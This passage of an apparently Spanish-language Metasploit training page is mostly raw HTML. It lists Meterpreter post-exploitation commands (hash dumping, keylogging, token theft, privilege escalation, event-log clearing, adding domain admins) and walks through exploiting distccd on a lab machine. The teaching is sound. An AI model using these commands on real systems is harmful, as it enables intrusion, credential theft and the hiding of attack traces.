class=\"has-text-align-left\" data-align=\"left\">\u200bdb_autopwn -p -r -e<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta db_autopwn contra todos los puertos encontrados, usa una shell reversa y los explota.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_destroy<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bElimina la actual base de datos<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdb_destroy [usuario]:[contrase\u00f1a]@[host]:[puerto]\/[base_de_datos]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bBorra una base de datos concret<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Estudia esta tabla y familiar\u00edzate con estos comandos, ya que los usar\u00e1s mucho.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-157-1024x258.png\" alt=\"\" class=\"wp-image-23536\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-157-1024x258.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-157-300x76.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-157-768x194.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-157.png 1151w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"408\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-158-1024x408.png\" alt=\"\" class=\"wp-image-23537\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-158-1024x408.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-158-300x120.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-158-768x306.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-158.png 1147w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"408\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-159-1024x408.png\" alt=\"\" class=\"wp-image-23538\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-159-1024x408.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-159-300x120.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-159-768x306.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-159.png 1141w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"296\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-160-1024x296.png\" alt=\"\" class=\"wp-image-23539\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-160-1024x296.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-160-300x87.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-160-768x222.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-160.png 1150w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"327\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-161-1024x327.png\" alt=\"\" class=\"wp-image-23540\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-161-1024x327.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-161-300x96.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-161-768x245.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-161.png 1141w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"418\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-162-1024x418.png\" alt=\"\" class=\"wp-image-23541\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-162-1024x418.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-162-300x122.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-162-768x313.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-162.png 1137w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"366\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-163-1024x366.png\" alt=\"\" class=\"wp-image-23542\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-163-1024x366.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-163-300x107.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-163-768x274.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-163.png 1153w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><code>-sV<\/code> \u2192 Detecta versiones de servicios Adem\u00e1s de puertos abiertos, intenta identificar qu\u00e9 corre en cada uno (Apache, SSH, etc.)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"313\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-164-1024x313.png\" alt=\"\" class=\"wp-image-23543\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-164-1024x313.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-164-300x92.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-164-768x234.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-164.png 1173w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msfconsole -q<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"472\" height=\"106\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-165.png\" alt=\"\" class=\"wp-image-23544\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-165.png 472w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-165-300x67.png 300w\" sizes=\"(max-width: 472px) 100vw, 472px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Un <strong>modificador<\/strong> es un par\u00e1metro que le agregas a un comando para cambiar su comportamiento.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Un ejemplo pr\u00e1ctico. Meterpreter<\/h3>\n\n\n\n<p>Siempre que se habla de&nbsp;<strong>Meterpreter<\/strong>&nbsp;son buenas noticias para el atacante. El meterpreter permite obtener una gran cantidad de informaci\u00f3n sobre una m\u00e1quina objetivo&nbsp; comprometida.<\/p>\n\n\n\n<p>No es m\u00e1s que un int\u00e9rprete que permite interactuar con el objetivo (v\u00edctima) por medio de una serie de instrucciones directas que son f\u00e1ciles de recordar y sirven para llevar a cabo procesos de post-explotaci\u00f3n. La comunicaci\u00f3n entre el interprete meterpreter y la maquina remota es v\u00eda SSL, es decir que la informaci\u00f3n intercambiada entre las dos maquinas viaja cifrada, adem\u00e1s es posible utilizar m\u00faltiples canales de ejecuci\u00f3n, es decir, m\u00faltiples programas ejecut\u00e1ndose en la maquina remota y todos pueden ser manejados desde meterpreter con los comandos&nbsp; \u00abchannel\u00bb y \u00abexecute\u00bb.<\/p>\n\n\n\n<p>Los comandos mas interesantes se listan a continuaci\u00f3n:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bhelp\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la ayuda.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200brun [script]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta un script de meterpreter<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsysinfo\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra la informaci\u00f3n del sistema comprometido<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bls\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra los ficheros y directorios del sistema comprometido<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200buse priv<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCarga librer\u00edas para elevar privilegios<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bps\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra los procesos en ejecuci\u00f3n<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bmigrate PID<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMigra un proceso espec\u00edfico.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200buse incognito<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCarga las librer\u00edas de inc\u00f3gnito.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200blist_tokens -u<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra los tokens disponibles por usuario<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200blist_tokens -g<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bMuestra los tokens disponibles por grupo<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bimpersonate_token [dominio]\\\\[usuario]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bApropiaci\u00f3n de un token disponible del objetivo.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsteal_token PID<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bApropiaci\u00f3n de un token disponible de un proceso dado<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdrop_token<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bDeja de usar el token actual<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bgetsystem\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bIntenta elevar los privilegios del usuario de acceso.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bshell\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta una Shell interactiva<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexecute -f cmd.exe -i<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta cmd.exe e interact\u00faa con \u00e9l<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexecute -f cmd.exe -i -t<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta cmd.exe con todos los tokens disponibles<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bexecute -f cmd.exe -i -H -t<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta cmd.exe con todos los tokens disponibles y lo convierte en un proceso oculto.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200brev2self<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bRetorna al usuario original que comprometi\u00f3 el sistema<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200breg [comando]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bEjecuta comandos en el registro del sistema comprometido<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsetdesktop [n\u00famero]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCambia de pantalla<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bscreenshot\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bToma una captura de pantalla del objetivo<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bupload file<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCarga un fichero en el objetivo<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bdownload file<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bDescarga un fichero del objetivo<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bkeyscan_start<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bComienza el sniffing del teclado.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bkeyscan_dump<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bVuelca las teclas pulsadas del sistema objetivo.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bkeyscan_stop<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bPara el sniffing del teclado.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bgetprivs\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bIntenta elevar privilegios.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200buictl enable keyboard\/mouse<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bToma el control del teclado o rat\u00f3n.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bbackground\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bSale de meterpreter sin cerrar la sesi\u00f3n.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bhashdump\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bObtiene todos los hashes del objetivo.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200buse sniffer<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCarga las librer\u00edas para esnifar.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsniffer_interfaces<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bLista los interfaces disponibles.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsniffer_dump [interfaceID] pcapname<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bComienza a esnifar un interfaz.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsniffer_start [interfaceID] packet-buffer<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bComienza a esnifar un rango espec\u00edfico.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsniffer_stats [interfaceID]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bPara obtener estad\u00edsticas de la interfaz.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bsniffer_stop interfaceID<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bDetiene el sniffer.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200badd_user [usuario] [contrase\u00f1a] -h [ip]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bA\u00f1ade un usuario en el sistema objetivo.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200badd_group_user \u00abDomain Admins\u00bb [usuario] -h [ip]<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bA\u00f1ade un usuario al grupo de administradores en el sistema objetivo.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200bclearev\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bVac\u00eda el log de eventos del sistema comprometido<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200btimestomp<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bCambia los atributos de un fichero.<\/td><\/tr><tr><td class=\"has-text-align-left\" data-align=\"left\">\u200breboot\u200b<\/td><td class=\"has-text-align-left\" data-align=\"left\">\u200bReinicia el sistema<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Ahora vamos a dejar un ejempo pr\u00e1ctico en im\u00e1genes (no tienes que hacer nada),&nbsp;para que tengas una demostraci\u00f3n visual de su uso. Para ello, hemos desplegado un entorno vulnerable y lo hemos atacado.<\/p>\n\n\n\n<p>Al escanear la m\u00e1quina con nmap, descubrimos el puerto 3632 donde se ejecuta un servicio distccd, el cual es un servicio de software que distribuye tareas de compilaci\u00f3n entre otras m\u00e1quinas participantes. Vamos a ver si tiene alguna vulnerabilidad. \u00bfSe te ocurre c\u00f3mo?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"416\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-166-1024x416.png\" alt=\"\" class=\"wp-image-23545\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-166-1024x416.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-166-300x122.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-166-768x312.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-166.png 1134w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Podemos buscar en internet o preguntar a\u00a0 metasploit qu\u00e9 vulnerabilidad hay asociada con ese servicio usando el comando\u00a0<strong><em>search<\/em><\/strong>.execute -f cmd.exe -i -t<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>search distccd<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"245\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-167-1024x245.png\" alt=\"\" class=\"wp-image-23546\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-167-1024x245.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-167-300x72.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-167-768x184.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-167.png 1206w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Ahora vamos a usar dicho exploit con el comando use. Simplemente debemos escribir la ruta completa desde\u00a0<em>exploit\/unix\/misc\/distcc_exec<\/em>. Tal como se muestra en la siguiente captura:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/unix\/misc\/distcc_exec<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"221\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-168-1024x221.png\" alt=\"\" class=\"wp-image-23547\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-168-1024x221.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-168-300x65.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-168-768x165.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-168.png 1179w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Y ver sus opciones<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>show options<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"408\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169-1024x408.png\" alt=\"\" class=\"wp-image-23548\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169-1024x408.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169-300x119.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169-768x306.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169-1536x611.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-169.png 1671w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"450\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-170-1024x450.png\" alt=\"\" class=\"wp-image-23549\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-170-1024x450.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-170-300x132.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-170-768x338.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-170.png 1139w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Luego ejecutamos \u00ab<strong><em>show options<\/em><\/strong>\u00bb ya que cada exploit debe de configurarse con los par\u00e1metros correctos. En este caso los campos\u00a0<em>RPORT<\/em>\u00a0y\u00a0<em>RHOSTS<\/em>\u00a0que son el puerto e IP remoto (v\u00edctima) son campos obligatorios a rellenar (required a yes), por lo que lo establecemos con el comando set a los valores adecuados.\u00a0<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"199\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-171-1024x199.png\" alt=\"\" class=\"wp-image-23550\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-171-1024x199.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-171-300x58.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-171-768x149.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-171.png 1127w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Una vez que tenemos todo listo, simplemente escribimos\u00a0<strong><em>run<\/em><\/strong>\u00a0o\u00a0<em><strong>exploit<\/strong><\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"507\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-172-1024x507.png\" alt=\"\" class=\"wp-image-23551\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-172-1024x507.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-172-300x149.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-172-768x380.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-172.png 1135w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tal como se puede apreciar en la captura, ya tenemos un meterpreter v\u00e1lido dentro de la m\u00e1quina atacada. Por lo que si escribimos,\u00a0<strong><em>shell<\/em><\/strong>, obtendremos una consola muy sencilla, con la que poder probar algunos comandos b\u00e1sicos. Al escribir \u00ab<strong><em>exit<\/em><\/strong>\u00bb nos vamos de la consola, y volvemos al meterpreter donde podemos seguir ejecutando comandos de meterpreter (como por ejemplo el comando\u00a0\u00ab<strong><em>sysinfo<\/em><\/strong>\u00bb para obtener informaci\u00f3n del sistema).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"445\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-173-1024x445.png\" alt=\"\" class=\"wp-image-23552\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-173-1024x445.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-173-300x130.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-173-768x333.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-173.png 1138w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"415\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-174-1024x415.png\" alt=\"\" class=\"wp-image-23553\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-174-1024x415.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-174-300x122.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-174-768x311.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-174.png 1140w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"410\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-175-1024x410.png\" alt=\"\" class=\"wp-image-23554\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-175-1024x410.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-175-300x120.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-175-768x308.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-175.png 1143w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"421\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-176-1024x421.png\" alt=\"\" class=\"wp-image-23555\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-176-1024x421.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-176-300x123.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-176-768x316.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-176.png 1134w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"256\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-177-1024x256.png\" alt=\"\" class=\"wp-image-23556\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-177-1024x256.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-177-300x75.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-177-768x192.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-177.png 1137w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u00bfQu\u00e9 comando intenta elevar los privilegios del usuario de acceso?<\/strong><\/li>\n\n\n\n<li>\u200bgetsystem<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"264\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-178-1024x264.png\" alt=\"\" class=\"wp-image-23557\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-178-1024x264.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-178-300x77.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-178-768x198.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-178.png 1158w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"265\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-179-1024x265.png\" alt=\"\" class=\"wp-image-23558\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-179-1024x265.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-179-300x78.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-179-768x199.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-179.png 1143w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"256\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-180-1024x256.png\" alt=\"\" class=\"wp-image-23559\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-180-1024x256.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-180-300x75.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-180-768x192.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-180.png 1152w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"425\" 